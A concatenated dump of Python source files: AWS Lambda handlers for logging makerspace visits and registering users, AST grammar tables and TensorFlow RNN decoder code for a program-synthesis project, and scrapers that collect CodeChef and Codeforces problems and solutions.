ReplyToAddresses=["<EMAIL>"],
Source=SENDER,
# If we were using a configuration set we would need the following line.
# ConfigurationSetName=CONFIGURATION_SET,
)
# Display an error if something goes wrong.
except ClientError as e:
self.logger.error(e.response['Error']['Message'])
def addVisitEntry(self, current_user, location):
# Get the current date at which the user logs in.
visit_date = datetime.datetime.now().timestamp()
# Add the item to the table.
response = self.visits.put_item(
# PK = Partition Key = Visit Date
# SK = Sort Key = Username or Email Address
Item={
'PK': str(visit_date),
'SK': current_user,
'location': location,
},
)
return response['ResponseMetadata']['HTTPStatusCode']
def handle_log_visit_request(self, request, context):
"""
Log the input of a user (namely, the username) from the makerspace console.
This should:
1. Check whether this user has visited before by looking for a
sentinel record in the table
2. Trigger a registration workflow if this is the first time for that user
3. Place a visit entry into the table
"""
# return client error if no string params
HEADERS = {
'Content-Type': 'application/json',
'Access-Control-Allow-Headers': 'Content-Type',
'Access-Control-Allow-Origin': os.environ["DOMAIN_NAME"],
'Access-Control-Allow-Methods': 'OPTIONS,POST,GET'
}
if (request is None):
return {
'headers': HEADERS,
'statusCode': 400,
'body': json.dumps({
"Message": "Failed to provide parameters"
})
}
try:
# Get the username from the request body.
username = json.loads(request["body"])["username"]
location = ' '
try:
location = json.loads(request["body"])["location"]
except Exception as e:
exception_type, exception_value, exception_traceback = sys.exc_info()
traceback_string = traceback.format_exception(
exception_type, exception_value, exception_traceback)
err_msg = json.dumps({
"errorType": "MissingParameter",
"errorMessage": "Missing parameter: location",
"errorTrace": traceback_string
})
self.logger.warn(err_msg)
# Check if this user has registered before.
registration = self.checkRegistration(username)
# If the user is not in the system, send a registration link.
if registration == 0:
self.registrationWorkflow(username)
# One could consider setting res = some other number here in order to
# bring up a page That lets the user know in order to sign in they
# have to check their email and register with the Makerspace.
# Call Function
res = self.addVisitEntry(username, location)
# Send response
return {
'headers': HEADERS,
'statusCode': res
}
except Exception as e:
# Return exception with response
return {
'headers': HEADERS,
'statusCode': 500,
'body': json.dumps({
'Message': str(e)
})
}
log_visit_function = LogVisitFunction(None, None)
def handler(request, context):
# This will be hit in prod, and will connect to the stood-up dynamodb
# and Simple Email Service clients.
return log_visit_function.handle_log_visit_request(request, context)
```
#### File: lambda_code/register_user/register_user.py
```python
import json
import boto3
from boto3.dynamodb.conditions import Key
import os
import datetime
class RegisterUserFunction():
"""
This class wraps the function of the lambda so we can more easily test
it with moto. In production, we will continue to pass the stood-up
dynamodb table to the handler itself. However, when initializing this class,
we can choose to instead initialize it with a mocked version of the
dynamodb table.
"""
def __init__(self, table):
if table is None:
# Default Behavior in Prod
# Get the service resource.
dynamodb = boto3.resource('dynamodb')
# Get the table name.
TABLE_NAME = os.environ["TABLE_NAME"]
# Get table objects
self.users = dynamodb.Table(TABLE_NAME)
else:
self.users = table
def addUserInfo(self, user_info):
# Get the current date at which the user registers.
timestamp = datetime.datetime.now()
response = self.users.put_item(
Item={
'PK': user_info['username'],
'SK': str(timestamp),
'firstName': user_info['firstName'],
'lastName': user_info['lastName'],
'Gender': user_info['Gender'],
'DOB': user_info['DOB'],
'Grad_date': user_info['Grad_Date'],
'Major': ', '.join(sorted(user_info['Major'])),
'Minor': ', '.join(sorted(user_info.get('Minor', [])))
},
)
return response['ResponseMetadata']['HTTPStatusCode']
def handle_register_user_request(self, request, context):
HEADERS = {
'Content-Type': 'application/json',
'Access-Control-Allow-Headers': 'Content-Type',
'Access-Control-Allow-Origin': os.environ["DOMAIN_NAME"],
'Access-Control-Allow-Methods': 'OPTIONS,POST,GET'
}
if (request is None):
return {
'headers': HEADERS,
'statusCode': 400,
'body': json.dumps({
"Message": "Failed to provide parameters"
})
}
# Get all of the user information from the json file
user_info = json.loads(request["body"])
# Call Function
response = self.addUserInfo(user_info)
# Send response
return {
'headers': HEADERS,
'statusCode': response
}
register_user_function = RegisterUserFunction(None)
def handler(request, context):
# Register user information from the makerspace/register console
# Since this will be hit in prod, it will go ahead and hit our prod
# dynamodb table
return register_user_function.handle_register_user_request(
request, context)
``` |
{
"source": "0bserver07/neural-engineers-first-attempt",
"score": 3
} |
#### File: load_d2c_data/_ast_final/final_short.py
```python
'''AbstractProgramSet class design from https://github.com/mokemokechicken/keras_npi'''
'''Star takes/transforms multiple parameters as/into a list, passing no parameters to star results in "[]" '''
'''Question Mark takes/transforms multiple parameters as/into a tuple, passing no parameters to star results in "None" '''
'''No ?/* takes exactly one argument'''
import string
import ast
from ast import *
from astmonkey import visitors, transformers
import re
import numpy as np
import collections
from collections import OrderedDict
class Program:
output_to_env = False
def __init__(self, name, *args):
self.name = name
self.args = args
#print self.args
self.program_id = None
'''self.variadic_args = [list containing names of which arguments are variadic (can be None if None are variadic)]'''
def description_with_args(self, args):
int_args = args.decode_all()
return "%s(%s)" % (self.name, ", ".join([str(x) for x in int_args]))
def to_one_hot(self, size, dtype=np.float):
ret = np.zeros((size,), dtype=dtype)
ret[self.program_id] = 1
return ret
def do(self, env, args):
raise NotImplementedError()
def __str__(self):
'''
return "<Program: name=%s>" % self.name
'''
return self.name
class AbstractProgramSet:
def __init__(self):
self.program_map = {}
self.program_id = 0
def register(self, pg):
pg.program_id = self.program_id
self.program_map[pg.program_id] = pg
self.program_id += 1
def create_and_register_all(self, all_pgs_in_class):
for i in all_pgs_in_class:
self.register(Program(i, *all_pgs_in_class[i]))
def get(self, i):
return self.program_map.get(i)
def get_arguments(self, i):
return self.program_map.get(i).args
mod_dict = {"Module": ['stmt* body'],
"Interactive": ['stmt* body'],
"Expression": ['expr body'],
"Suite": ['stmt* body'],
}
stmt_dict = {"FunctionDef": ['identifier name', 'arguments args', 'stmt* body', 'expr* decorator_list'],
"ClassDef": ['identifier name', 'expr* bases', 'stmt* body', 'expr* decorator_list'],
"Return": ['expr? value'],
"Delete": ['expr* targets'],
"Assign": ['expr* targets', 'expr value'],
"AugAssign": ['expr target', 'operator op', 'expr value'],
"Print": ['expr? dest', 'expr* values', 'bool nl'],
"For": ['expr target', 'expr iter', 'stmt* body', 'stmt* orelse'],
"While": ['expr test', 'stmt* body', 'stmt* orelse'],
"If": ['expr test', 'stmt* body', 'stmt* orelse'],
"With": ['expr context_expr', 'expr? optional_vars', 'stmt* body'],
"Raise": ['expr? type', 'expr? inst', 'expr? tback'],
"TryExcept": ['stmt* body', 'excepthandler* handlers', 'stmt* orelse'],
"TryFinally": ['stmt* body', 'stmt* finalbody'],
"Assert": ['expr test', 'expr? msg'],
"Import": ['alias* names'],
"ImportFrom": ['identifier? module', 'alias* names', 'int? level'],
"Exec": ['expr body', 'expr? globals', 'expr? locals'],
"Global": ['identifier* names'],
"Expr": ['expr value'],
"Pass": [],
"Break": [],
#"attributes": ['int lineno', 'int col_offset'],
}
expr_dict = {"BoolOp": ['boolop op', 'expr* values'],
"BinOp": ['expr left', 'operator op', 'expr right'],
"UnaryOp": ['unaryop op', 'expr operand'],
"Lambda": ['arguments args', 'expr body'],
"IfExp": ['expr test', 'expr body', 'expr orelse'],
"Dict": ['expr* keys', 'expr* values'],
"Set": ['expr* elts'],
"ListComp": ['expr elt', 'comprehension* generators'],
"SetComp": ['expr elt', 'comprehension* generators'],
"DictComp": ['expr key', 'expr value', 'comprehension* generators'],
"GeneratorExp": ['expr elt', 'comprehension* generators'],
"Yield": ['expr? value'],
"Compare": ['expr left', 'cmpop* ops', 'expr* comparators'],
"Call": ['expr func', 'expr* args', 'keyword* keywords, expr? starargs', 'expr? kwargs'],
"Repr": ['expr value'],
"Num": ['object n'],
"Str": ['string s'],
"Attribute": ['expr value', 'identifier attr', 'expr_context ctx'],
"Subscript": ['expr value', 'slice slice', 'expr_context ctx'],
"Name": ['identifier id', 'expr_context ctx'],
"List": ['expr* elts', 'expr_context ctx'],
"Tuple": ['expr* elts', 'expr_context ctx'],
#"attributes": ['int lineno', 'int col_offset'],
}
expr_context_dict = {"Load": [], "Store": [], "Del": [], "AugLoad": [], "AugStore": [], "Param": []}
slice_dict = {"Ellipsis": [],
"Slice": ['expr? lower', 'expr? upper', 'expr? step'],
"ExtSlice": ['slice* dims'],
"Index": ['expr value'],
}
boolop_dict = {"And": [], "Or": []}
operator_dict = {"Add": [], "Sub": [], "Mult": [], "Div": [], "Mod": [],
"Pow": [], "LShift": [], "RShift": [], "BitOr": [],
"BitXor": [], "BitAnd": [], "FloorDiv": []}
unaryop_dict = {"Invert": [], "Not": [], "UAdd": [], "USub": []}
cmpop_dict = {"Eq": [], "NotEq": [], "Lt": [], "LtE": [], "Gt": [],
"GtE": [], "Is": [], "IsNot": [], "In": [], "NotIn": []}
comprehension_dict = {"comprehension": ['expr target', 'expr iter', 'expr* ifs']}
excepthandler_dict = {"ExceptHandler": ['expr? type', 'expr? name', 'stmt* body'],
"attributes ": ['int lineno', 'int col_offset']}
arguments_dict = {"arguments": ['expr* args', 'identifier? vararg', 'identifier? kwarg', 'expr* defaults']}
keyword_dict = {"keyword": ['identifier arg', 'expr value']}
alias_dict = {"alias": ['identifier name', 'identifier? asname']}
bool_dict = '''True/False'''
'''below are built_in_types that skip the class and jump straight to function'''
'''e.g. looks like ='turnt' or =12 instead of looking like =Load() or =Store()'''
'''if one these, rnn needs to generate or copy a sequence of character'''
#identifier
#int
#string
#object
#bool #selects True or False
#ones that take string with quotes are string, identifier
#string can be any character(s)
#identifier can only start with letter and _ and can only consist of those and num
#ones that take string without quotes are int, object
#int can only be numbers, 'L', '-'
#object can only be numbers, 'L' decimal_point, 'e', '+', '-'
program_classes_list = ['mod', 'stmt', 'expr', 'expr_context', 'slice', 'boolop', 'operator', 'unaryop', 'cmpop', 'comprehension', 'excepthandler', 'arguments', 'keyword', 'alias']
program_classes = {}
'''THIS LOOP SHOULD PROBABLY BE PUT IN A CLASS OR FUNCTION'''
for i in program_classes_list:
program_classes[i] = AbstractProgramSet()
exec("program_classes[i].create_and_register_all(%s)" % (i+"_dict"))
def to_one_hot(program_id, size, dtype=np.float):
ret = np.zeros((size,), dtype=dtype)
ret[program_id] = 1
return ret
def get_pc_index(key_name):
for i in range(len(program_classes.keys())):
if program_classes.keys()[i] == str(key_name):
return i
def get_p_index(pc_name, p_name):
for i in range(0, program_classes[pc_name].program_id):
if str(program_classes[pc_name].get(i)) == str(p_name):
return i
args_demo = ('expr* args', 'identifier? vararg', 'identifier? kwarg', 'expr* defaults')
arg_amount_dic = {1: '', 2: '*', 3: '?'}
'''I think this is used to let rnn know how many arguments it's selecting'''
def argument_parser(arguments):
parse_args =[]
for argument in arguments:
parse_args.append(re.split(' ', argument))
return parse_args
#print argument_parser(args_demo)
```
#### File: 0bserver07/neural-engineers-first-attempt/rnn_decoder_utils.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from functools import partial
import tensorflow as tf
from tensorflow.contrib.layers import fully_connected
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variable_scope as vs
__all__ = ["rnn_decoder",
"rnn_decoder_attention"]
"""Used to project encoder state in `rnn_decoder`"""
encoder_projection = partial(fully_connected, activation_fn=math_ops.tanh)
def rnn_decoder(cell, decoder_inputs, initial_state,
sequence_length, decoder_fn,
encoder_projection=encoder_projection,
parallel_iterations=None, swap_memory=False,
time_major=False, scope=None):
"""RNN decoder for a sequence-to-sequence model specified by RNNCell 'cell'.
The 'rnn_decoder' is similar to the 'tf.python.ops.rnn.dynamic_rnn'. As the
decoder does not make any assumptions of sequence length of the input or how
many steps it can decode, since 'rnn_decoder' uses dynamic unrolling. This
allows `decoder_inputs` to have [None] in the sequence length of the decoder
inputs.
The parameter decoder_inputs is nessesary for both training and evaluation.
During training it is feed at every timestep. During evaluation it is only
feed at time==0, as the decoder needs the `start-of-sequence` symbol, known
from Sutskever et al., 2014 https://arxiv.org/abs/1409.3215, at the
beginning of decoding.
The parameter sequence length is nessesary as it determines how many
timesteps to decode for each sample. TODO: Could make it optional for
training.
Args:
cell: An instance of RNNCell.
inputs: The RNN inputs.
If `time_major == False` (default), this must be a `Tensor` of shape:
`[batch_size, max_time, ...]`.
If `time_major == True`, this must be a `Tensor` of shape:
`[max_time, batch_size, ...]`.
The input to `cell` at each time step will be a `Tensor` with dimensions
`[batch_size, ...]`.
sequence_length: An int32/int64 vector sized `[batch_size]`.
initial_state: An initial state for the RNN.
Must be [batch_size, num_features], where num_features does not have to
match the cell.state_size. As a projection is performed at the beginning
of the decoding.
decoder_fn: A function that takes a state and returns an embedding.
The decoder function is closely related to `_extract_argmax_and_embed`.
Here is an example of a `decoder_fn`:
def decoder_fn(embeddings, weight, bias):
def dec_fn(state):
prev = tf.matmul(state, weight) + bias
return tf.gather(embeddings, tf.argmax(prev, 1))
return dec_fn
encoder_projection: (optional) given that the encoder might have a
different size than the decoder, we project the intial state as
described in Bahdanau, 2014 (https://arxiv.org/abs/1409.0473).
The optional `encoder_projection` is a
`tf.contrib.layers.fully_connected` with
`activation_fn=tf.python.ops.nn.tanh`.
parallel_iterations: (Default: 32). The number of iterations to run in
parallel. Those operations which do not have any temporal dependency
and can be run in parallel, will be. This parameter trades off
time for space. Values >> 1 use more memory but take less time,
while smaller values use less memory but computations take longer.
swap_memory: Transparently swap the tensors produced in forward inference
but needed for back prop from GPU to CPU. This allows training RNNs
which would typically not fit on a single GPU, with very minimal (or no)
performance penalty.
time_major: The shape format of the `inputs` and `outputs` Tensors.
If true, these `Tensors` must be shaped `[max_time, batch_size, depth]`.
If false, these `Tensors` must be shaped `[batch_size, max_time, depth]`.
Using `time_major = True` is a bit more efficient because it avoids
transposes at the beginning and end of the RNN calculation. However,
most TensorFlow data is batch-major, so by default this function
accepts input and emits output in batch-major form.
scope: VariableScope for the created subgraph; defaults to "RNN".
Returns:
A pair (outputs, state) where:
outputs: The RNN output `Tensor`.
If time_major == False (default), this will be a `Tensor` shaped:
`[batch_size, max_time, cell.output_size]`.
If time_major == True, this will be a `Tensor` shaped:
`[max_time, batch_size, cell.output_size]`.
state: The final state. If `cell.state_size` is an int, this
will be shaped `[batch_size, cell.state_size]`. If it is a
`TensorShape`, this will be shaped `[batch_size] + cell.state_size`.
Raises:
TypeError: If `cell` is not an instance of RNNCell.
"""
with vs.variable_scope(scope or "decoder") as varscope:
# Project initial_state as described in Bahdanau et al. 2014
# https://arxiv.org/abs/1409.0473
state = encoder_projection(initial_state, cell.output_size)
# Setup of RNN (dimensions, sizes, length, initial state, dtype)
# Setup dtype
dtype = state.dtype
if not time_major:
# [batch, seq, features] -> [seq, batch, features]
decoder_inputs = array_ops.transpose(decoder_inputs, perm=[1, 0, 2])
# Get data input information
batch_size = array_ops.shape(decoder_inputs)[1]
decoder_input_depth = int(decoder_inputs.get_shape()[2])
# Setup decoder inputs as TensorArray
decoder_inputs_ta = tensor_array_ops.TensorArray(dtype, size=0,
dynamic_size=True)
decoder_inputs_ta = decoder_inputs_ta.unpack(decoder_inputs)
# Define RNN: loop function for training.
# This will run in the while_loop of 'raw_rnn'
def loop_fn_train(time, cell_output, cell_state, loop_state):
emit_output = cell_output
if cell_output is None:
next_cell_state = state # use projection of prev encoder state
else:
next_cell_state = cell_state
elements_finished = (time >= sequence_length) # TODO handle seq_len=None
finished = math_ops.reduce_all(elements_finished)
# Next input must return zero state for last element explanation below
# https://github.com/tensorflow/tensorflow/issues/4519
next_input = control_flow_ops.cond(
finished,
lambda: array_ops.zeros([batch_size, decoder_input_depth],
dtype=dtype),
lambda: decoder_inputs_ta.read(time))
next_loop_state = None
return (elements_finished, next_input, next_cell_state,
emit_output, next_loop_state)
# Define RNN: loop function for evaluation.
# This will run in the while_loop of 'raw_rnn'
def loop_fn_eval(time, cell_output, cell_state, loop_state):
emit_output = cell_output
if cell_output is None:
next_cell_state = state # use projection of prev encoder state
else:
next_cell_state = cell_state
elements_finished = (time >= sequence_length) # TODO handle seq_len=None
finished = math_ops.reduce_all(elements_finished)
# Next input must return zero state for last element explanation below
# https://github.com/tensorflow/tensorflow/issues/4519
next_input = control_flow_ops.cond(
finished,
lambda: array_ops.zeros([batch_size, decoder_input_depth],
dtype=dtype),
lambda: control_flow_ops.cond(math_ops.greater(time, 0),
lambda: decoder_fn(next_cell_state), # Gather max prediction.
lambda: decoder_inputs_ta.read(0))) # Read <EOS> tag
next_loop_state = None
return (elements_finished, next_input, next_cell_state,
emit_output, next_loop_state)
# Run raw_rnn function
outputs_ta_train, _, _ = \
rnn.raw_rnn(cell, loop_fn_train,
parallel_iterations=parallel_iterations,
swap_memory=swap_memory, scope=varscope)
# Reuse the cell for evaluation
varscope.reuse_variables()
outputs_ta_eval, _, _ = \
rnn.raw_rnn(cell, loop_fn_eval,
parallel_iterations=parallel_iterations,
swap_memory=swap_memory, scope=varscope)
outputs_train = outputs_ta_train.pack()
outputs_eval = outputs_ta_eval.pack()
if not time_major:
# [seq, batch, features] -> [batch, seq, features]
outputs_train = array_ops.transpose(outputs_train, perm=[1, 0, 2])
outputs_eval = array_ops.transpose(outputs_eval, perm=[1, 0, 2])
return outputs_train, outputs_eval
def rnn_decoder_attention(*args, **kwargs):
pass
def rnn_decoder_simple(cell, decoder_inputs, initial_state, loop_function=None,
scope=None):
"""RNN decoder for the sequence-to-sequence model.
Args:
decoder_inputs: A list of 2D Tensors [batch_size x input_size].
initial_state: 2D Tensor with shape [batch_size x cell.state_size].
cell: rnn_cell.RNNCell defining the cell function and size.
loop_function: If not None, this function will be applied to the i-th output
in order to generate the i+1-st input, and decoder_inputs will be ignored,
except for the first element ("GO" symbol). This can be used for decoding,
but also for training to emulate http://arxiv.org/abs/1506.03099.
Signature -- loop_function(prev, i) = next
* prev is a 2D Tensor of shape [batch_size x output_size],
* i is an integer, the step number (when advanced control is needed),
* next is a 2D Tensor of shape [batch_size x input_size].
scope: VariableScope for the created subgraph; defaults to "rnn_decoder".
Returns:
A tuple of the form (outputs, state), where:
outputs: A list of the same length as decoder_inputs of 2D Tensors with
shape [batch_size x output_size] containing generated outputs.
state: The state of each cell at the final time-step.
It is a 2D Tensor of shape [batch_size x cell.state_size].
(Note that in some cases, like basic RNN cell or GRU cell, outputs and
states can be the same. They are different for LSTM cells though.)
"""
with vs.variable_scope(scope or "rnn_decoder"):
state = initial_state
outputs = []
prev = None
for i, inp in enumerate(decoder_inputs):
if loop_function is not None and prev is not None:
with vs.variable_scope("loop_function", reuse=True):
inp = loop_function(prev, i)
if i > 0:
vs.get_variable_scope().reuse_variables()
output, state = cell(inp, state)
outputs.append(output)
if loop_function is not None:
prev = output
return outputs, state
class CustomCell(tf.nn.rnn_cell.RNNCell):
"""Gated Recurrent Unit cell (cf. http://arxiv.org/abs/1406.1078)."""
def __init__(self, num_units, num_weights):
self._num_units = num_units
self._num_weights = num_weights
@property
def state_size(self):
return self._num_units
@property
def output_size(self):
return self._num_units
def __call__(self, inputs, state, scope=None):
with tf.variable_scope(scope or type(self).__name__): # "GRUCell"
with tf.variable_scope("Gates"): # Reset gate and update gate.
# We start with bias of 1.0 to not reset and not update.
ru = tf.nn.rnn_cell._linear([inputs, state],
2 * self._num_units, True, 1.0)
ru = tf.nn.sigmoid(ru)
r, u = tf.split(1, 2, ru)
with tf.variable_scope("Candidate"):
lambdas = tf.nn.rnn_cell._linear([inputs, state], self._num_weights, True)
lambdas = tf.split(1, self._num_weights, tf.nn.softmax(lambdas))
Ws = tf.get_variable("Ws",
shape=[self._num_weights, inputs.get_shape()[1], self._num_units])
Ws = [tf.squeeze(i) for i in tf.split(0, self._num_weights, Ws)]
candidate_inputs = []
for idx, W in enumerate(Ws):
candidate_inputs.append(tf.matmul(inputs, W) * lambdas[idx])
Wx = tf.add_n(candidate_inputs)
c = tf.nn.tanh(Wx + tf.nn.rnn_cell._linear([r * state],
self._num_units, True, scope="second"))
new_h = u * state + (1 - u) * c
return new_h, new_h
```
#### File: scrapers/codechef/codechef_scraper_clean_pts_for_hardest.py
```python
import shutil
import os
import re
import requests
import urllib2
from pprint import pprint
from bs4 import BeautifulSoup
import html2text
import time
import argparse
import concurrent.futures
def escape_lt(html):
html_list = list(html)
for index in xrange(0, len(html) - 1):
if html_list[index] == '<' and html_list[index + 1] == ' ':
html_list[index] = '<'
return ''.join(html_list)
'''TODO: not sure if this one makes sense'''
def escape_gt(html):
html_list = list(html)
for index in xrange(0, len(html) - 1):
if html_list[index] == ' ' and html_list[index + 1] == '>':
html_list[index + 1] = '>'
return ''.join(html_list)
def get_problem_list(url):
page = requests.get(url)
if str(page) == "<Response [503]>":
while str(page) == "<Response [503]>":
time.sleep(1)
page = requests.get(url)
html_content = page.text
soup = BeautifulSoup(html_content, "html.parser")
messages = []
text = soup.select("body a")
for row in text:
message = ""
raw = str(row)
body = re.search('/submit/(.*)" t', raw)
if body != None:
w = body.group(1)
message = str(w)
if message != 'easy' and message != 'medium' and message != 'hard' and message != 'challenge' and message != 'extcontest' and message != 'school':
messages.append(message)
return messages
def get_solution_ids(name, language):
if language == 'python':
url = 'https://www.codechef.com/status/%s?sort_by=All&sorting_order=asc&language=4&status=15&handle=&Submit=GO' % (name)
url2 = 'https://www.codechef.com/status/%s?page=1&sort_by=All&sorting_order=asc&language=4&status=15&handle=&Submit=GO' % (name)
elif language == 'c++':
url = 'https://www.codechef.com/status/%s?sort_by=All&sorting_order=asc&language=41&status=15&handle=&Submit=GO' % (name)
url2 = 'https://www.codechef.com/status/%s?page=1&sort_by=All&sorting_order=asc&language=41&status=15&handle=&Submit=GO' % (name)
else:
pass
page1 = requests.get(url)
if str(page1) == "<Response [503]>":
while str(page1) == "<Response [503]>":
time.sleep(1)
page1 = requests.get(url)
page2 = requests.get(url2)
if str(page2) == "<Response [503]>":
while str(page2) == "<Response [503]>":
time.sleep(1)
page2 = requests.get(url2)
if re.search("<div align='center' class='pageinfo'>", page1.text) == None:
html_content = page1.text
else:
html_content = page1.text + page2.text
messages = []
solution_id = re.findall("href='/viewsolution/(.+?)' target='_blank'>View", html_content)
pts = re.findall("/>\\[(.+?)pts\\]<", html_content)
if len(pts) != 0 and len(solution_id) != 0:
for i in range(len(pts)):
if str(pts[i]) == '100' or (float(pts[i]) > .997 and float(pts[i]) < 1.001):
messages.append(str(solution_id[i]))
elif len(pts) == 0 and len(solution_id) != 0:
for i in range(len(solution_id)):
messages.append(str(solution_id[i]))
else:
pass
return messages
def get_description(i):
descriptions = []
left_out = []
failed_to_download_d = []
url = "https://www.codechef.com/api/contests/PRACTICE/problems/" + str(i)
page = requests.get(url)
if str(page) == "<Response [503]>":
while str(page) == "<Response [503]>":
time.sleep(1)
page = requests.get(url)
html_content = page.text
if re.search('"message":"requests limit exhausted"', html_content) != None:
while re.search('message":"requests limit exhausted', html_content) != None:
time.sleep(1)
page = requests.get(url)
html_content = page.text
if html_content==None:
failed_to_download_d.append(i)
if re.search('src="https://s3.amazonaws.com/codechef_shared/download/upload', html_content.replace("\\", "")) == None and re.search('src="/download/extimages', html_content.replace("\\", "")) == None and re.search('"message":"Problem is not visible now. Please try again later."', html_content) == None:
first_clean = page.json()['body'].replace("<sup>", "<sup>^").replace(" <=", u" ≤").replace(" >=", u" ≥").replace("<=", u" ≤ ").replace(">=", u" ≥ ").replace(u"≤ ", u"≤ ").replace(u"≥ ", u"≥ ").replace("<h3>", "<h3>\n")
keep_lt = escape_lt(first_clean)
second_clean = escape_gt(keep_lt)
body = BeautifulSoup(second_clean).get_text()
w = body
w = w.replace("\nAll submissions for this problem are available.", "")
w = w.replace("All submissions for this problem are available.", "")
w = re.sub('\n Read problems statements in (.+?)\n', '', w, re.M)
w = re.sub('\nRead problems statements in (.+?)\n', '', w, re.M)
w = re.sub(' Read problems statements in (.+?)\n', '', w, re.M)
w = re.sub('Read problems statements in (.+?)\n', '', w, re.M)
w = re.sub('Subtask(.+?)Example', 'Example', w, flags=re.M|re.S)
w = w.replace("\u003C","<")
w = w.replace("\u003E",">")
w = w.replace("\\","\\\\")
descriptions.append(w.encode('utf-8').decode('string-escape'))
else:
left_out.append(i)
return descriptions, left_out, failed_to_download_d
def get_solutions(solution_ids):
solutions = {}
failed_to_download_s = []
with concurrent.futures.ProcessPoolExecutor(max_workers=50) as executor:
future_to_url = {executor.submit(get_solution, i): i for i in solution_ids}
for future in concurrent.futures.as_completed(future_to_url):
data = future.result()
if data[2] == None:
solutions[data[0]] = data[1]
return solutions
def get_solution(solution_id):
url = "https://www.codechef.com/viewplaintext/" + str(solution_id)
page = requests.get(url)
if str(page) == "<Response [503]>":
while str(page) == "<Response [503]>":
time.sleep(1)
page = requests.get(url)
html_content = page.text
if html_content==None:
failed_to_download_s.append(i)
text = BeautifulSoup(html_content, "html.parser").get_text()
failed_to_download = None
solution = None
if len(text)==0 or re.search('var _sf_startpt = (new Date()).getTime()', text) != None:
failed_to_download = solution_id
else:
text = text.replace("\\","\\\\")
solution = text.encode('utf-8').decode('string-escape')
return solution_id, solution, failed_to_download
def download_all_challenge_names(filename):
target = open(filename, 'w')
problems = get_problem_list("https://www.codechef.com/problems/school/?sort_by=SuccessfulSubmission&sorting_order=desc")
target.write(str("\neasy\n"))
target.write(str(problems))
problems = get_problem_list("https://www.codechef.com/problems/easy/?sort_by=SuccessfulSubmission&sorting_order=desc")
target.write(str("\nmedium\n"))
target.write(str(problems))
problems = get_problem_list("https://www.codechef.com/problems/medium/?sort_by=SuccessfulSubmission&sorting_order=desc")
target.write(str("\nhard\n"))
target.write(str(problems))
problems = get_problem_list("https://www.codechef.com/problems/hard/?sort_by=SuccessfulSubmission&sorting_order=desc")
target.write(str("\nharder\n"))
target.write(str(problems))
problems = get_problem_list("https://www.codechef.com/problems/challenge/?sort_by=SuccessfulSubmission&sorting_order=desc")
target.write(str("\nhardest\n"))
target.write(str(problems))
problems = get_problem_list("https://www.codechef.com/problems/extcontest/?sort_by=SuccessfulSubmission&sorting_order=desc")
target.write(str("\nexternal\n"))
target.write(str(problems))
def download_descriptions_solutions(filename, index_n):
root_dir = 'codechef_data_currently'
file = open(filename, 'r')
f = open(filename, 'r')
index_n_int = int(index_n)
start = index_n_int + (500*index_n_int)
end = start + 499
easy = []
medium = []
hard = []
harder = []
hardest = []
external = []
g = ""
i=0
for line in f:
if str(line).find('type=') != -1:
body = re.search('type=(.*)', line)
g = body.group(1)
else:
if str(g) == "easy":
easy = eval(line)
elif str(g) == "medium":
medium = eval(line)
elif str(g) == "hard":
hard = eval(line)
elif str(g) == "harder":
harder = eval(line)
elif str(g) == "hardest":
hardest = eval(line)
elif str(g) == "external":
external = eval(line)
else:
pass
all_names = []
all_names_p = []
all_names =[["easy", easy], ["medium", medium], ["hard", hard], ["harder", harder], ["hardest", hardest], ["external", external]]
already_scraped = []
for ndx, n in enumerate(all_names):
category = all_names[ndx][0]
problem_list = all_names[ndx][1]
language = ["python", "c++"]
for idx, i in enumerate(problem_list):
descriptions, left_out, failed_to_download_d = get_description(i)
if i not in left_out:
if not os.path.exists(root_dir):
os.makedirs(root_dir)
cat_dir = root_dir + "/" + category
if not os.path.exists(cat_dir):
os.makedirs(cat_dir)
save_dir = cat_dir + "/" + i
if not os.path.exists(save_dir):
os.makedirs(save_dir)
description_dir = save_dir + "/description"
if not os.path.exists(description_dir):
os.makedirs(description_dir)
description_file_path = description_dir + "/description.txt"
description_file = open(description_file_path, 'w')
description_file.write(str(descriptions[0]))
#'''
ids_l = []
for l in language:
ids = get_solution_ids(i, l)
ids_l.append(ids)
solutions = get_solutions(ids)
solution_dir = save_dir + "/solutions_" + l
if not os.path.exists(solution_dir):
os.makedirs(solution_dir)
for jdx, j in enumerate(solutions):
if len(solutions[j]) < 10000:
solution_file_path = solution_dir + "/" + j + ".txt"
solution_file = open(solution_file_path, 'w')
solution_file.write(solutions[j])
#remove problems with zero solutions
if len(ids_l[0]) == 0 and len(ids_l[1]) == 0:
shutil.rmtree(save_dir)
print("Finished download process")
if len(failed_to_download) > 0:
print "Following challenges failed to download: " + str(failed_to_download)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--index', type=str, default="index", help='')
args = parser.parse_args()
index_n = args.index
download_descriptions_solutions('codechef_problem_names.txt', index_n)
```
#### File: scrapers/codeforces/codeforces_get_list_and_tags.py
```python
from pprint import pprint
from bs4 import BeautifulSoup
import requests
import urllib2
import re
'''
info = 'http://codeforces.com/api/user.status?handle=tacklemore&from=1&count=1'
solution = 'view-source:http://codeforces.com/contest/686/submission/18671530'
do not include problems with http://codeforces.com/predownloaded/
'''
def get_problem_list(url):
page = requests.get(url)
if str(page) == "<Response [503]>":
while str(page) == "<Response [503]>":
time.sleep(1)
page = requests.get(url)
html_content = page.text
soup = BeautifulSoup(html_content, "html.parser") # making soap
messages = []
tags = []
problem_and_tags = {}
problem_and_tags_array = []
text = soup.select("body a")
body_problem_prev = None
b_p = None
for row in text:
message = ""
raw = str(row)
body_problem = re.search(' href="/problemset/submit/(.*)">', raw)
body_tag = re.search(' href="/problemset/tags/(.*)" style', raw)
#second_tag = re.search('style="float:right', raw)
if body_problem != None:
w = body_problem.group(1)
message = str(w)
b_p = message.replace('/', '_')
problem_and_tags[b_p] = tags
problem_and_tags_array.append(problem_and_tags)
problem_and_tags = {}
tags = []
if body_tag != None:
w = body_tag.group(1)
message = str(w)
b_t = message
tags.append(b_t)
return problem_and_tags_array
problem_list = []
for i in range(0,30):
a = 'http://codeforces.com/problemset/page/' + str(i+1)
l = get_problem_list(a)
problem_list += l
print(problem_list)
'''
for k in sorted(problem_list):
print k.replace(' ', '_'), problem_list[k]
#'''
description_file = open("tags.txt", 'w')
description_file.write('')
for k in problem_list:
description_file = open("tags.txt", 'a')
description_file.write(str(k) + "\n")
```
#### File: scrapers/codeforces/codeforces_scraper.py
```python
import shutil
import os
import re
import requests
import urllib2
from pprint import pprint
